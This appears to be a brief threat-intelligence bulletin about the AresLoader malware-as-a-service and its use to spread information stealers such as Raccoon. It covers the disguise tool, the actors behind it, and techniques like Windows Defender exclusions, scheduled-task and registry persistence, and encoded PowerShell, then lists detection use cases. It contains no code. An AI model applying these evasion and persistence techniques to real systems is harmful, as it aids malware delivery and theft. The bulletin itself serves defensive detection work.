AresLoader MaaS Used to Distribute Information Stealing Malware
Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Intel471
New loader malware-as-a-service (MaaS) AresLoader has been identified in the wild. The service is offered by threat actors associated with Russian hacktivism, and many users use it to distribute various information stealers. As reported by Intel471 the first sighting of AresLoader in the wild came on January 26th, 2023. A unique feature of AresLoader is its "binder" tool, which allows users to disguise their malware as legitimate software. In November 2022, a threat actor named AiD Lock or DarkBLUP introduced AresLoader on Telegram and later advertised it on underground cybercrime forums RAMP and XSS.
"The group we associated AiD Lock with, PHANTOM DEV, engaged in hacktivist activities in mid-2022 and claimed affiliation with the Red Hackers Alliance Russia aka RHA, RHA R pro-Russian hacktivist group. Evidence suggests multiple members of this group are either users or administrators of the AresLoader MaaS," Intel471 assessed. Further analysis of an AresLoader infection found the malware uses its disguise as a popular application to initiate the execution of legitimate software and also a malicious batch script. The script is responsible for adding an exclusion path in Windows Defender as well as downloading and executing info-stealing malware such as Raccoon stealer. For persistence, AresLoader creates a scheduled task in addition to adding a registry key in the Run registry.
- AVL_UC17231 - Script Modifies System/Download Payloads with Persistence
Anvilogic Use Cases:
- AVL_UC1001 - Encoded Powershell Command
- AVL_UC5996 - Modify Windows Defender
- AVL_UC6144 - Output to File